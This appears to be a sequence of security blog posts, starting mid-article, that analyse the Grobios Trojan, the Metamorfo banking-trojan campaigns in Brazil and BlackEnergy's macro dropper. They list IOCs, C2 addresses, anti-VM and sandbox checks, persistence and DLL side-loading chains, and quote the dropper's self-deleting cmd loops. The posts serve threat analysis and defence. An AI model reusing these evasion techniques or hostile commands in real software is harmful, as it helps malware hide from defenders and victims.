When opened, the Flash file drops the Grobios Trojan. Figure 5 shows the callback traffic from the Grobios Trojan.


Figure 5: Grobios callback

Analysis of the Dropped Malware

Grobios uses various techniques to evade detection and gain persistence on the machine, which makes it hard for it to be uninstalled or to go inactive on the victim machine. It also uses multiple anti-debugging, anti-analysis and anti-VM techniques to hide its behavior. After successful installation on the victim machine, it connects to its command and control (C2) server, which responds with commands.

In an effort to evade static detection, the authors have packed the sample with PECompact 2.xx. The unpacked sample has no function entries in the import table. It uses API hashing to obfuscate the names of API functions it calls and parses the PE header of the DLL files to match the name of a function to its hash. The malware also uses stack strings. Figure 6 shows an example of the malware calling WinApi using the hashes.


Figure 6: An example of calling WinAPI using their hashes.

Loading

The malware sample starts a copy of itself, which further injects its code into svchost.exe or IEXPLORE.EXE depending on the user privilege level. Both parent and child quit after injection is complete. Only svchost.exe/IEXPLORE.EXE keeps running. Figure 7 shows the process tree.


Figure 7: Process tree of the malware

Persistence

The malware has an aggressive approach to persistence. It employs the following techniques:

  • It drops a copy of itself into the %APPDATA% folder, masquerading as a version of legitimate software installed on the victim machine. It creates an Autorun registry key and a shortcut in the Windows Startup folder. During our analysis, it dropped itself to the following path:

%APPDATA%\Google\v2.1.13554\<RandomName>.exe. 

The path can vary depending on the folders the malware finds in %APPDATA%.

  • It drops multiple copies of itself in subfolders of a program at the path %ProgramFiles%/%PROGRAMFILES(X86)%,  again masquerading as a different version of the installed program, and sets an Autorun registry key or creates a scheduled task.
  • It drops a copy itself in the %Temp% folder, and creates a scheduled task to run it.

On an infected system, the malware creates two scheduled tasks, as shown in Figure 8.


Figure 8: Scheduled tasks created by the malware

The malware changes the file Created, Modified, and Accessed times of all of its dropped copies to the Last Modified time of ntdll.dll. To bypass the “File Downloaded from the Internet” warning, the malware removes the :Zone.Identifier flag using DeleteFile API, as shown in Figure 9.


Figure 9: Call to DeleteFileW to remove the :Zone.Identifier Flag from the dropped copy

An interesting behavior of this malware is that it protects its copy in the %TEMP% folder using EFS (Windows Encrypted File System), as seen in Figure 10.


Figure 10: Cipher Command Shows the Malware Copy Protected by EFS

Detecting VM and Malware Analysis Tools

Just before connecting to the C2, the malware does a series of checks to detect the VM and malware analysis environment. It can detect almost all well-known VM software, including Xen, QEMU, VMWare, Virtualbox, Hyper-V, and so on. The following is the list of checks it performs on the victim system:

  • Using the FindWindowEx API, it checks whether any of the analysis tools in Table 1 are running on the system.

Analysis Tools

PacketSniffer

FileMon

WinDbg

Process Explorer

OllyDbg

SmartSniff

cwmonitor

Sniffer

Wireshark

Table 1: Analysis tools detected by malware

  • The malware contains a list of hashes of blacklisted process names. It checks whether the hash of any of running process matches a hash on the blacklist, as shown in Figure 11. 


Figure 11: Check for blacklisted processes

We were able to crack the hashes of the blacklisted processes shown in Table 2.

Hash

Process

283ADE38h

vmware.exe

8A64214Bh

vmount2.exe

13A5F93h

vmusrvc.exe

0F00A9026h

vmsrvc.exe

0C96B0F73h

vboxservice.exe

0A1308D40h

vboxtray.exe

0E7A01D35h

xenservice.exe

205FAB41h

joeboxserver.exe

6F651D58h

joeboxcontrol.exe

8A703DD9h

wireshark.exe

1F758DBh

Sniffhit.exe

0CEF3A27Ch

sysAnalyzer.exe

6FDE1C18h

Filemon.exe

54A04220h

procexp.exe

0A17C90B4h

Procmon.exe

7215026Ah

Regmon.exe

788FCF87h

autoruns.exe

0A2BF507Ch

 

0A9046A7Dh

 

Table 2: Blacklisted processes

  • The malware enumerates registry keys in the following paths to see if they contain the words xen or VBOX:
    • HKLM\HARDWARE\ACPI\DSDT
    • HKLM\HARDWARE\ACPI\FADT
    • HKLM\HARDWARE\ACPI\RSDT
  • It checks whether services installed on the system contain any of the keywords in Table 3:

vmmouse

vmdebug

vmicexchange

vmicshutdown

vmicvss

vmicheartbeat

msvmmouf

VBoxMouse

vpcuhub

vpc-s3

vpcbus

vmx86

vmware

VMMEMCTL

VMTools

XenVMM

xenvdb

xensvc

xennet6

xennet

xenevtchn

VBoxSF

VBoxGuest

   

Table 3: Blacklisted service names

  • It checks whether the username contains any of these words:  MALWARE, VIRUS, SANDBOX, MALTEST
  • It has a list of hashes of blacklisted driver names. It traverses the windows driver directory %WINDIR%\system32\drivers\ using FindFirstFile/FindNextFile APIs to check if the hash of the name of any drivers matches with that of any blacklisted driver's name, as shown in Table 4.

Hash

Driver

0E687412Fh

hgfs.sys

5A6850A1h

vmhgfs.sys

0CA5B452h

prleth.sys

0F9E3EE20h

prlfs.sys

0E79628D7h

prlmouse.sys

68C96B8Ah

prlvideo.sys

0EEA0F1C2h

prl_pv32.sys

443458C9h

vpcs3.sys

2F337B97h

vmsrvc.sys

4D95FD80h

vmx86.sys

0EB7E0625h

vmnet.sys

Table 4: Hashes of blacklisted driver names

  • It calculates the hash of ProductId and matches it with three blacklisted hashes to detect public sandboxes, shown in Table 5.

Hash

Product Id

Sandbox Name

4D8711F4h

76487-337-8429955-22614

Anubis Sanbox

7EBAB69Ch

76487-644-3177037-23510

CWSandbox

D573F44D

55274-640-2673064-23950

Joe Sandbox

Table 5: Blacklisted product IDs

  • The malware calculates the hash of loaded module (DLL) names and compares them with the list of hashes of blacklisted module names shown in Table 6. These are the DLLs commonly loaded into the process being debugged, such as dbhelp.dll and api_log.dll.    

6FEC47C1h

6C8B2973h

0AF6D9F74h

49A4A30h

3FA86C7Dh

Table 6: Blacklisted module names hashes

Figure 12 shows the flow of code that checks for blacklisted module hashes.


Figure 12: Code checks for blacklisted module hashes

  • It checks whether Registry keys present at the path HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum and HKLM\SYSTEM\ControlSet001\Services\Disk\Enum contain any of these words: QEMU, VBOX, VMWARE, VIRTUAL
  • It checks whether registry keys at the path HKLM\SOFTWARE\Microsoft, HKLM\SOFTWARE  contain these words: VirtualMachine, vmware, Hyber-V
  • It checks whether the system bios version present at registry path HKLM\HARDWARE\DESCRIPTION\System\SystemBiosVersion contains these words: QEMU, BOCHS, VBOX
  • It checks whether the video bios version present at registry path HKLM\HARDWARE\DESCRIPTION\System\VideoBiosVersion contains  VIRTUALBOX substring.
  • It checks whether the registry key at path HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0\Identifier contains any of these words: QEMU,vbox, vmware
  • It checks whether the registry key HKLM\SOFTWARE\Oracle\VirtualBox Guest Additions  exists on the system.

Network Communication

The malware contains two hardcoded obfuscated C2s. After de-obfuscating the C2 URLs, it generates a random string of 20 characters, appends it to the end of URL, and sends the request for commands. Before it executes the commands, the malware verifies the identity of the C2. It calculates the hash of 4 bytes of data using the CALG_MD5 algorithm. It then uses the Base64 data from the CERT command as a Public Key in CryptVerifySignature to verify the hash signature (Figure 13). If the signature is verified, the malware executes the commands.


Figure 13: Malware verifies the C2 hash

During our initial analysis, we found that the malware supports the commands shown in Table 7. 

Command

Description

CERT <Base64 data>

Contains the data used to verify the identity of the C2

CONNECT <IP:Port>

Connect to given host for further commands

DISCONNECT

Close all the connections

WAIT <Number of seconds>

Wait for the number of seconds before executing the next commands

REJECT

Kind of NOP. Move on to next command after waiting for 5 second

Table 7: Commands supported by malware

Figure 14 shows commands being issued by the C2 server.


Figure 14: Commands issued by the C2 server

Conclusion

Despite the decline in activity, exploit kits still continue to put users at risk – especially those running older versions of software. Enterprises need to make sure their network nodes are fully patched.

All FireEye products detect the malware in our MVX engine. Additionally, FireEye Network Security blocks delivery at the infection point.

Indicators of Compromise (IOCs)

  • 30f03b09d2073e415a843a4a1d8341af
  • 99787d194cbd629d12ef172874e82738
  • 169.239.129[.]17
  • grobiosgueng[.]su

Acknowledgments 

We acknowledge Mariam Muntaha for her contribution to the blog regarding malicious traffic analysis.

Metamorfo Campaigns Targeting Brazilian Users

FireEye Labs recently identified several widespread malspam (malware spam) campaigns targeting Brazilian companies with the goal of delivering banking Trojans. We are referring to these campaigns as Metamorfo. Across the stages of these campaigns, we have observed the use of several tactics and techniques to evade detection and deliver the malicious payload. In this blog post we dissect two of the main campaigns and explain how they work.

Campaign #1

The kill chain starts with an email containing an HTML attachment with a refresh tag that uses a Google URL shortener as the target. Figure 1 shows a sample email, and Figure 2 show the contents of the HTML file.


Figure 1: Malicious Email with HTML Attachment


Figure 2: Contents of HTML File

When the URL is loaded, it redirects the victim to a cloud storage site such as GitHub, Dropbox, or Google Drive to download a ZIP file. An example is shown in Figure 3.


Figure 3: URL Shortener Redirects to Github Link

The ZIP archive contains a malicious portable executable (PE) file with embedded HTML application (HTA). The user has to unzip the archive and double-click the executable for the infection chain to continue. The PE file is a simple HTA script compiled into an executable. When the user double-clicks the executable, the malicious HTA file is extracted to %temp% and executed by mshta.exe.

The HTA script (Figure 4) contains VBS code that fetches a second blob of VBS code encoded in base64 form from hxxp://<redacted>/ilha/pz/logs.php. 


Figure 4: Contents of HTA File

After the second stage of VBS is decoded (Figure 5 and Figure 6), the script downloads the final stage from hxxp://<redacted>/28022018/pz.zip. 


Figure 5: Contents of Decoded VBS


Figure 6: More Contents of Decoded VBS

The downloaded ZIP file contains four files. Two are PE files. One is a legitimate Windows tool, pvk2pfx.exe, that is abused for DLL side-loading. One is the malicious banking Trojan as the DLL.

The VBS code unzips the archive, changes the extension of the legitimate Windows tool from .png to .exe, and renames the malicious DLL as cryptui.dll. The VBS code also creates a file in C:\Users\Public\Administrador\car.dat with random strings. These random strings are used to name the Windows tool, which is then executed. Since this tool depends on a legitimate DLL named cryptui.dll, the search order path will find the malicious Trojan with the same name in the same directory and load it into its process space.

In Q4 of 2017, a similar malspam campaign delivered the same banking Trojan by using an embedded JAR file attached in the email instead of an HTML attachment. On execution, the Java code downloaded a ZIP archive from a cloud file hosting site such as Google Drive, Dropbox, or Github. The ZIP archive contained a legitimate Microsoft tool and the malicious Trojan.

Banking Trojan Analysis

The Trojan expects to be located in the hardcoded directory C:\\Users\\Public\Administrador\\ along with three other files to start execution. As seen in Figure 7, these files are:

  • car.dat (randomly generated name given to Windows tool)
  • i4.dt (VBS script that downloads the same zip file)
  • id (ID given to host)
  • cryptui.dll (malicious Trojan)


Figure 7: Contents of ZIP Archive

Persistence

The string found in the file C:\\Users\\Public\\Administrador\\car.dat is extracted and used to add the registry key Software\Microsoft\Windows\CurrentVersion\Run\<string from car.dat> for persistence, as shown in Figure 8.


Figure 8: Reading from car.dat File

The sample also looks for a file named i4.dt in the same directory and extracts the contents of it, renames the file to icone.vbs, and creates a new persistent key (Figure 9) in \Software\Microsoft\Windows\CurrentVersion\Run to open this file.


Figure 9: Persistence Keys

The VBS code in this file (Figure 10) has the ability to recreate the whole chain and download the same ZIP archive.


Figure 10: Contents of VBS Script

Next, the Trojan searches for several folders in the Program Files directories, including:

  • C:\\Program Files\\AVG
  • C:\\Program Files\\AVAST Software
  • C:\\Program Files\\Diebold\\Warsaw
  • C:\\Program Files\\Trusteer\\Rapport
  • C:\\Program Files\\Java
  • C:\\Program Files (x86)\\scpbrad

If any of the folders are found, this information, along with the hostname and Operating System version, is sent to a hardcoded domain with the hardcoded User-Agent value “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0” in the format shown in Figure 11. The value of AT is “<host_name+OS&MD>=<list of folders found>”.


Figure 11: Network Traffic for Host Enumeration

The sample iterates through the running processes, kills the following, and prevents them from launching:

  • msconfig.exe
  • TASKMGR.exe
  • regedit.exe
  • ccleaner64.exe
  • taskmgr.exe
  • itauaplicativo.exe

Next, it uses GetForegroundWindow to get a handle to the window the user is viewing and GetWindowText to extract the title of the window. The title is compared against a hardcoded list of Brazilian banking and digital coin sites. The list is extensive and includes major organizations and smaller entities alike. 

If any of those names are found and the browser is one of the following, the Trojan will terminate that browser.

  • firefox.exe
  • chrome.exe
  • opera.exe
  • safari.exe

The folder C:\Users\Public\Administrador\logs\ is created to store screenshots, as well as the number of mouse clicks the user has triggered while browsing the banking sites (Figure 12). The screenshots are continuously saved as .jpg images.


Figure 12: Malware Capturing Mouse Clicks

Command and Control

The command and control (C2) server is selected based on the string in the file “id”:

  • al -> '185.43.209[.]182'
  • gr -> '212.237.46[.]6'
  • pz -> '87.98.146[.]34'
  • mn -> ’80.211.140[.]235'

The connection to one of the hosts is then started over raw TCP on port 9999. The command and control communication generally follows the pattern <|Command |>, for example:

  • '<|dispida|>logs>SAVE<' sends the screenshots collected in gh.txt.
  • '<PING>' is sent from C2 to host, and '<PONG>' is sent from host to C2, to keep the connection alive.
  • '<|INFO|>' retrieves when the infection first started based on the file timestamp from car.dat along with '<|>' and the host information.

There were only four possible IP addresses that the sample analyzed could connect to based on the strings found in the file “id”. After further researching the associated infrastructure of the C2 (Figure 13), we were able to find potential number of victims for this particular campaign.

 

Figure 13: Command and Control Server Open Directories

Inside the open directories, we were able to get the following directories corresponding to the different active campaigns. Inside each directory we could find statistics with the number of victims reporting to the C2. As of 3/27/2018, the numbers were:

  • al – 843
  • ap – 879
  • gr – 397
  • kk – 2,153
  • mn – 296
  • pz – 536
  • tm – 187

A diagram summarizing Campaign #1 is shown in Figure 14.


Figure 14: Infection Chain of Campaign #1

Campaign #2

In the second campaign, FireEye Labs observed emails with links to legitimate domains (such as hxxps://s3-ap-northeast-1.amazonaws[.]com/<redacted>/Boleto_Protesto_Mes_Marco_2018.html) or compromised domains (such as hxxps://curetusu.<redacted>-industria[.]site/) that use a refresh tag with a URL shortener as the target. The URL shortener redirects the user to an online storage site, such as Google Drive, Github, or Dropbox, that hosts a malicious ZIP file. A sample phishing email is shown in Figure 15.


Figure 15: Example Phishing Email

The ZIP file contains a malicious executable written in AutoIt (contents of this executable are shown in Figur 16). When executed by the user, it drops a VBS file to a randomly created and named directory (such as C:\mYPdr\TkCJLQPX\HwoC\mYPdr.vbs) and fetches contents from the C2 server.


Figure 16: Contents of Malicious AutoIt Executable

Two files are downloaded from the C2 server. One is a legitimate Microsoft tool and the other is a malicious DLL: 

  • https[:]//panel-dark[.]com/w3af/img2.jpg
  • https[:]//panel-dark[.]com/w3af/img1.jpg

Those files are downloaded and saved into random directories named with the following patterns:

  • <current user dir>\<5 random chars>\<8 random chars>\<4 random chars>\<5 random chars>.exe
  • <current user dir>\<5 random chars>\<8 random chars>\<4 random chars>\CRYPTUI.dll 

The execution chain ensures that persistence is set on the affected system using a .lnk file in the Startup directory. The .lnk file shown in Figure 17 opens the malicious VBS dropped on the system.


Figure 17: Persistence Key

The VBS file (Figure 18) will launch and execute the downloaded legitimate Windows tool, which in this case is Certmgr.exe. This tool will be abused using the DLL side loading technique. The malicious Cryptui.dll is loaded into the program instead of the legitimate one and executed.


Figure 18: Contents of Dropped VBS File

Banking Trojan Analysis

Like the Trojan from the first campaign, this sample is executed through search-order hijacking. In this case, the binary abused is a legitimate Windows tool, Certmgr.exe, that loads Cryptui.dll. Since this tool depends on a legitimate DLL named cryptui.dll, the search order path will find the malicious Trojan with the same name in the same directory and load it into its process space.

The malicious DLL exports 21 functions. Only DllEntryPoint contains real code that is necessary to start the execution of the malicious code. The other functions return hardcoded values that serve no real purpose.

On execution, the Trojan creates a mutex called "correria24" to allow only one instance of it to run at a time.

The malware attempts to resolve “www.goole[.]com” (most likely a misspelling). If successful, it sends a request to hxxp://api-api[.]com/json in order to detect the external IP of the victim. The result is parsed and execution continues only if the country code matches “BR”, as shown in Figure 19.


Figure 19: Country Code Check

The malware creates an empty file in %appdata%\Mariapeirura on first execution, which serves as a mutex lock, before attempting to send any collected information to the C2 server. This is done in order to get only one report per infected host.

The malware collects host information, base64 encodes it, and sends it to two C2 servers. The following items are gathered from the infected system:

  • OS name
  • OS version
  • OS architecture
  • AV installed
  • List of banking software installed
  • IP address
  • Directory where malware is being executed from

The information is sent to hxxp://108.61.188.171/put.php (Figure 20).


Figure 20: Host Recon Data Sent to First C2 Server

The same information is sent to panel-dark[.]com/Contador/put.php (Figure 21).


Figure 21: Host Recon Data Sent to Second C2 Server

The malware alters the value of registry key Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ExtendedUIHoverTime to 2710 in order to change the number of milliseconds a thumbnail is showed while hovering on the taskbar, as seen in Figure 22.


Figure 22: ExtendedUIHoverTime Registry Key Change

Like the Trojan from the first campaign, this sample checks if the foreground window's title contains names of Brazilian banks and digital coins by looking for hardcoded strings.

The malware displays fake forms on top of the banking sites and intercepts credentials from the victims. It can also display a fake Windows Update whenever there is nefarious activity in the background, as seen in Figure 23.


Figure 23: Fake Form Displaying Windows Update

The sample also contains a keylogger functionality, as shown in Figure 24.


Figure 24: Keylogger Function

Command and Control

The Trojan’s command and control command structure is identical to the first sample. The commands are denoted by the <|Command|> syntax.

  • <|OK|> gets a list of banking software installed on the host.
  • '<PING>' is sent from C2 to host, and '<PONG>' is sent from host to C2, to keep connection alive.
  • <|dellLemb|> deletes the registry key \Software\Microsoft\Internet Explorer\notes.
  • EXECPROGAM calls ShellExecute to run the application given in the command.
  • EXITEWINDOWS calls ExitWindowsEx.
  • NOVOLEMBRETE creates and stores data sent with the command in the registry key \Software\Microsoft\Internet Explorer\notes.


Figure 25: Partial List of Victims

This sample contains most of the important strings encrypted. We provide the following script (Figure 26) in order to decrypt them.


Figure 26: String Decryption Script

Conclusion

The use of multi-stage infection chains makes it challenging to research these types of campaigns all the way through.

As demonstrated by our research, the attackers are using various techniques to evade detection and infect unsuspecting Portuguese-speaking users with banking Trojans. The use of public cloud infrastructure to help deliver the different stages plays a particularly big role in delivering the malicious payload. The use of different infection methods combined with the abuse of legitimate signed binaries to load malicious code makes these campaigns worth highlighting.

Indicators of Compromise

Campaign #1
TYPE HASH DESCRIPTION
MD5 860fa744d8c82859b41e00761c6e25f3 PE with Embedded HTA
MD5 3e9622d1a6d7b924cefe7d3458070d98 PE with Embedded HTA
MD5 f402a482fd96b0a583be2a265acd5e74 PE with Embedded HTA
MD5 f329107f795654bfc62374f8930d1e12 PE with Embedded HTA
MD5 789a021c051651dbc9e01c5d8c0ce129 PE with Embedded HTA
MD5 68f818fa156d45889f36aeca5dc75a81 PE with Embedded HTA
MD5 c2cc04be25f227b13bcb0b1d9811e2fe cryptui.dll
MD5 6d2cb9e726c9fac0fb36afc377be3aec id
MD5 dd73f749d40146b6c0d2759ba78b1764 i4.dt
MD5 d9d1e72165601012b9d959bd250997b3 VBS file with commands to create staging directories for malware
MD5 03e4f8327fbb6844e78fda7cdae2e8ad pvk2pfx.exe [Legit Windows Tool]
URL   hxxp://5.83.162.24/ilha/pz/logs.php
URL   hxxp://5.83.162.24/28022018/pz.zip 
C2   ibamanetibamagovbr[.]org/virada/pz/logs.php
URL   sistemasagriculturagov[.]org
URL   hxxp://187.84.229.107/05022018/al.zip
Campaign #2
TYPE HASH DESCRIPTION
MD5 2999724b1aa19b8238d4217565e31c8e AutoIT Dropper
MD5 181c8f19f974ad8a84b8673d487bbf0d img1.jpg [lLegit Windows Tool]
MD5 d3f845c84a2bd8e3589a6fbf395fea06 img2.jpg [Banking Trojan]
MD5 2365fb50eeb6c4476218507008d9a00b Variants of Banking Trojan
MD5 d726b53461a4ec858925ed31cef15f1e Variants of Banking Trojan
MD5 a8b2b6e63daf4ca3e065d1751cac723b Variants of Banking Trojan
MD5 d9682356e78c3ebca4d001de760848b0 Variants of Banking Trojan
MD5 330721de2a76eed2b461f24bab7b7160 Variants of Banking Trojan
MD5 6734245beda04dcf5af3793c5d547923 Variants of Banking Trojan
MD5 a920b668079b2c1b502fdaee2dd2358f Variants of Banking Trojan
MD5 fe09217cc4119dedbe85d22ad23955a1 Variants of Banking Trojan
MD5 82e2c6b0b116855816497667553bdf11 Variants of Banking Trojan
MD5 4610cdd9d737ecfa1067ac30022d793b Variants of Banking Trojan
MD5 34a8dda75aea25d92cd66da53a718589 Variants of Banking Trojan
MD5 88b808d8164e709df2ca99f73ead2e16 Variants of Banking Trojan
MD5 d3f845c84a2bd8e3589a6fbf395fea06 Variants of Banking Trojan
MD5 28a0968163b6e6857471305aee5c17e9 Variants of Banking Trojan
MD5 1285205ae5dd5fa5544b3855b11b989d Variants of Banking Trojan
MD5 613563d7863b4f9f66590064b88164c8 Variants of Banking Trojan
MD5 3dd43e69f8d71fcc2704eb73c1ea7daf Variants of Banking Trojan
C2   https[:]//panel-dark[.]com/w3af/img2.jpg 
C2   https[:]//panel-dark[.]com/w3af/img1.jpg 

Breaking Down the Malware Behind the Ukraine Power Outage

Security researchers recently discovered that the power outage in the Ukraine in December was caused by a malware and identified as an evolved version of BlackEnergy. This Trojan, dating back to 2007, was a popular malware that was previously sold in Russian underground sites. However, its design and architecture changed from performing simple HTTP DDos attacks to modular functional strategy implementation. The latest version of this Trojan is now capable of dropping rootkits, performing stealthy approaches and backdoor commands via a CnC server. It is also worth noting that it is highly speculated to be utilized by a group of attackers that are against the government of Ukraine. Since Stuxnet, this BlackEnergy cyberattack is another of its kind since it also managed to sabotage an industrial sector and that the group responsible for the power outage was also linked to the Trojan found in the mining and railway sector of Ukraine.

Industrial systems typically electrical, power, oil or water uses Industrial Control Systems (ICS), which are used for control, supervision and data collection. Usually, the ICS are on an isolated network and, although still part of the network, rarely have limited access to the internet. It is interesting how BlackEnergy managed to get inside these systems. Later during our analysis, we will gain insight on what happened and how the group managed to infiltrate the network from the initial stage of the attack via a phishing email.

This blog will focus on the analysis of BlackEnergy, parts of its core components, as well as how ThreatTrack’s ThreatAnalyzer and ThreatSecure provide us the information needed for data intelligence gathering. We’ll leave the analysis of the plugins that BlackEnergy utilized for another separate blog.

This research also aims to provide information on (1) how to emulate the attack by dissecting each stage of the process and (2) show how to utilize ThreatTrack’s newest line of threat identification products to mitigate and lessen the probability that these types of outbreaks might happen to you or your company. We’ll begin the analysis using the two samples that we have.

Md5: 97b7577d13cf5e3bf39cbe6d3f0a7732

  • Type: XLS (Microsoft Excel file)
  • First seen: 8/16/2015

Md5: e15b36c2e394d599a8ab352159089dd2

  • Type: DOC (Microsoft Document file)
  • First seen: 1/22/2016

BlackEnergy’s method of arrival is via a spear-phishing email containing a malicious attachment. We can emulate this by attaching the samples that we have on an email and send it inside our network. There has been a lot of debate as to how the attachment(s) was/were executed since, for this version of BlackEnergy, no exploits of Office have been seen. The only thing we know is that somehow a person inside executed the document file(s), whether by social engineering or an insider.

Using ThreatTrack’s ThreatSecure Network and ThreatSecure Email, we can see that it was identified as something malicious when entering the network and also via email. The system changes that it will be performing can be seen under behaviors. The IP entry indicates the IP address of a remote server that it is trying to beacon to. Since this sample is already a few months old, and news of this attack has already been widespread, it only makes sense that the server is already down.

TSN_Excel

Fig 1: TSN catching the XLS attachment

docTSN_identified

Fig 2: TSN catching the DOC file

tse_unreviewed

Fig 2.1: ThreatSecure Email (TSE)

tse_details

Fig 2.2: Submit for Remediation

A cool feature of ThreatSecure Network is that, once a threat has been identified, any connection made to the target computer will be monitored and can be seen in the ThreatSecure Network UI  called ThressionsTM. Using these Thressions, users will be alerted that an attack is happening or has happened and, depending on their settings, will be able to block a said network session. Fig 2.1 and Fig 2.2 above show that the file we are analyzing was caught by ThreatSecure Email, and upon user’s request can be submitted for remediation to remove the system changes done by the malware.

It is a good practice to find out what the malware does in overview prior to getting deep in the assembly breakdown. There are a couple of ways we can do this. You can use an infected machine and the tools available on the net to see what the malware does upon execution. But this would take time and effort to set up, and there’s a much faster and easier way we can do this: Use a sandbox.

ThreatTrack’s dynamic malware analysis sandbox ThreatAnalyzer reveals the behaviors not normally seen on normal programs.

We started with the DOC file (e15b36c2e394d599a8ab352159089dd2) and the XLS (97b7577d13cf5e3bf39cbe6d3f0a7732), and both showed the same behavior:

  • Dropped the following files
    • %Temp%\vba_macro.exe
    • LNK file (windows shortcut) pointing to the DOC file
    • %Application Data%\FONTCACHE.DAT
    • %User%\NTUSER.LOG
    • %Common Startup%\<adapter name>.LNK file
  • Creates a named pipe
    • Pipe\{AA0EED25-4167-4CBB-BDA8-9A0F5FF93EA8}
  • Executed the following processes, some of the spawned multiple times
    • Vba_macro.exe
    • Cmd.exe
    • Attrib.exe
    • Ping.exe
    • Rundll32.exe %Application Data%\FONTCACHE.DAT, #1
    • %Program Files%\iexplore.exe
  • A screenshot showing what the document looks like when opened (DOC and XLS)
  • Created/Modified the following registry
    • Software\Microsoft\Internet Explorer\Main Check_Associations
    • Software\Microsoft\Internet Explorer\InformationBar FirstTime
    • Software\Microsoft\Internet Explorer\New Windows PopupMgr
    • Software\Microsoft\Internet Explorer\PhishingFilter Enabled
    • Software\Microsoft\Windows\CurrentVersion\Internet Settings\Cache Persistent
    • Software\Microsoft\Internet Explorer\TabbedBrowsing WarnOnClose
    • Software\Microsoft\Internet Explorer\TabbedBrowsing WarnOnCloseAdvanced
    • Software\Microsoft\Internet Explorer\Main DisableFirstRunCustomize
    • Software\Microsoft\Internet Explorer\Recovery NoReopenLastSession
    • Software\Microsoft\Internet Explorer\Main NoProtectedModeBanner
    • Software\Microsoft\Internet Explorer\TabbedBrowsing
    • Software\Microsoft\Internet Explorer\Recovery
  • Attempted to connect to a remote server
    • 5.149..254.114
    • Usage of RPCRT4.DLL
TA_processes

Fig 2.3: ThreatAnalyzer showing processes spawned by the DOC file

Looking a bit deeper

Now that we have an overview of what the samples are doing, we’ll do some classic reverse-engineering.

Although the two samples have different hashes and file formats (the one is a word document file and the other an excel sheet) they are, in basic sense, the same.

Both have a malicious macro script embedded in them and both are trying to deceive the user from disabling the macro security settings that is enabled by default. A fake Microsoft Office message appears in Russian, stating “This document was created by a newer version of Microsoft office. Macros must be enabled to display the content of the document.”

Depending on the security settings of Microsoft Office (high, medium or low), the image on Fig 4 will be displayed. If a user somehow chose to disable the macro security or is on a low security level, the malicious scripts previously mentioned will be executed immediately.

security_macro

Fig 3: Security on medium settings

Looking inside the VB macro, the code are fairly straightforward:

  • Declares a series of byte array
  • Save it in a file located in the %TEMP% directory
  • Execute the said file using the function SHELL
Fig 4

Fig 4: Byte array declaration (MZ)

 

Fig 5: Byte array declaration (PE)

Fig 5: Byte array declaration (PE)

Fig 4 shows the value 77, 90 in array a (1). Converted to hex, that is 0x4D, 0x5A (MZ), which is a strong indicator that these sequence of array is an executable. This is further verified in Fig 6, where we see 80, 69 that, when converted to hex, results in 0x50, 0x45 (PE).

Automatic execution is achieved by doing the following:

Fig 6: Byte array declaration (PE)

Fig 6: Byte array declaration (PE)

Fig 7. Deobfuscated macro

To put it simply, Fig 7 tells us that it will save the byte array into a file named vba_macro.exe located in %TEMP% directory and execute it using the Shell function.

Vba_macro.exe

According to the results from ThreatAnalyzer, Vba_macro.exe will spawn a file named FONTCACHE.DAT and several other processes. Looking inside the vba_macro executable, it seems it is heavily obfuscated at its entry point. It is posing as a file with an original name of packet.dll and is exposing several functions similar to that of being used by WinPCap. The weird thing is that although the function names are similar to that of a legit packet.dll located at the system directory (assuming WinPCap is installed), the assembled code is garbage, except for the first function, which is probably the deobfuscator code.

packet_dll_comparison

Fig 8: Note the similarities and the difference between the two.

The primary purpose of this file is to stage the next part of the infection process, which is to execute FONTCACHE.DAT.

Upon execution, this file reconstructs its code in an allocated part of memory and writes parts of itself in a separate file, the FONTCACHE.DAT, in the Application data folder. The GetAdaptersInfo API is used to get the name of the network card in use, use that as a file name for the .LNK, which is a windows shortcut file that will execute another program indicated on its path. On this case, it uses this method to ensure that the program it points to %windir%\System32\rundll32.exe “C:\Documents and Settings\Administrator\Local Settings\Application Data\FONTCACHE.DAT” will always get started upon boot up.

It deletes the credential named MCSF_Config before executing FONTCACHE.DAT using rundll32 with #1, indicating to execute the first ordinal function. This version of BlackEnergy uses the said credential to store its configuration, and in order to ensure that it will have the latest config, it deletes it prior to executing FONTCACHE.DAT.

creddelete_shellexecute

Fig 9: CredDeleteA and ShellExecute

It will call the following command line shell commands

cmd /s /c “for /L %i in (1,1,100) do (del /F “%TEMP%\vba_macro.exe” & ping localhost -n 2 & if not exist “%Application Data%\FONTCACHE.DAT” Exit 1)

cmd /s /c “for /L %i in (1,1,100) do (attrib +h “%TEMP%\vba_macro.exe” & del /A:h /F “%TEMP%\vba_macro.exe” & ping localhost -n 2 & if not exist “%Application Data%\FONTCACHE.DAT” Exit 1)

FONTCACHE.DAT

Fontcache.dat is executed using rundll32, a way for Windows to run compiled libraries. It has an argument of #1, which means to run the first ordinal in its exported functions.

In an attempt to make a researcher’s life more difficult and in order to slow down the time to fully analyze the malware, the authors decided to obfuscate, again, this piece of malware.

We’ll get a bit deeper by trying to unpack the malware using old methods. It is common knowledge for malware analysts to set a break point to common memory allocating APIs, such as VirtualAlloc and LocalAlloc, and see whether the malware is trying to unpack part of itself in memory; however, this particular sample uses RtlAlloc and HeapAlloc to copy parts of itself little by little.

After decryption and some initializations, it will enter its main loop.

mainloop_flow_letters

Fig 10: Chart of main function of FONTCACHE.DAT

(A) Attempts to read the current user’s credential named MCSF_Config using CredReadA API. The one that will be read is actually an encrypted buffer that will be written by the malware in function (B). This encrypted buffer will be decrypted twice and will contain information like the CnC server URL, bot version, build type and some other strings that will be appended to locally gathered data.

decrypted_configuration

(B) Reads the data in the .CDATA section of FONTCACHE.DAT and overwrites the current user’s credential with that blob. This is achieved via CredWriteA API. This part also gathers local information about the target system and saves it for later use.

(C) Responsible for modifying the settings for Internet Explorer in the registry.

    • Software\Microsoft\Internet Explorer\Main Check_Associations
    • Software\Microsoft\Internet Explorer\InformationBar FirstTime
    • Software\Microsoft\Internet Explorer\New Windows PopupMgr
    • Software\Microsoft\Internet Explorer\PhishingFilter Enabled
    • Software\Microsoft\Windows\CurrentVersion\Internet Settings\Cache Persistent
    • Software\Microsoft\Internet Explorer\TabbedBrowsing WarnOnClose
    • Software\Microsoft\Internet Explorer\TabbedBrowsing WarnOnCloseAdvanced
    • Software\Microsoft\Internet Explorer\Main DisableFirstRunCustomize
